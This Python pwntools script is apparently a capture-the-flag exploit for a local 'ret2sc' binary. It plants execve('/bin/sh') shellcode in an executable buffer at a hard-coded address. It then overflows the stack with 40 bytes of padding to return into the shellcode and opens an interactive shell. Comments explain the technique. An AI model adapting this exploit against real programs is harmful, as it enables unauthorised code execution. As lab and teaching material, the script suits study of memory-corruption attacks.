#! /usr/bin/python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 howpwn <finn79426@gmail.com>
#
# Distributed under terms of the MIT license.

from pwn import *

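# ret2shellcode: the target is assumed to be a non-PIE binary whose input
# buffer is both writable and executable (no NX), so a fixed address can be
# used for the shellcode.  Stage 1 writes the shellcode into that buffer;
# stage 2 overflows the stack and returns into it.
context.arch = "amd64"  # must be set before asm()/shellcraft/flat() below
p = process("./ret2sc")

# Bytes from the start of the overflowed buffer up to the saved return address.
padding = 40

# execve("/bin/sh") shellcode for context.arch.
shellcode = asm(shellcraft.sh())

# Address of the buffer that the first read() fills.  Found by breaking on the
# read() call in gdb and inspecting its second argument (the buf pointer).
# Hard-coded, so it only holds for this exact binary built without PIE.
name_addr = 0x601080

# Stage 1: plant the shellcode.  sendline() appends "\n", which lands after
# the shellcode and is harmless unless the buffer is exactly shellcode-sized;
# use send() in that case.
p.recvuntil(b":")
p.sendline(shellcode)

# Stage 2: overwrite the saved return address with the shellcode buffer's
# address.  bytes throughout so this works on both Python 2 and 3 (flat()
# returns bytes under Python 3, and str + bytes raises TypeError there).
payload = b"A" * padding
payload += flat([name_addr])

p.recvuntil(b":")
p.sendline(payload)

p.interactive()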


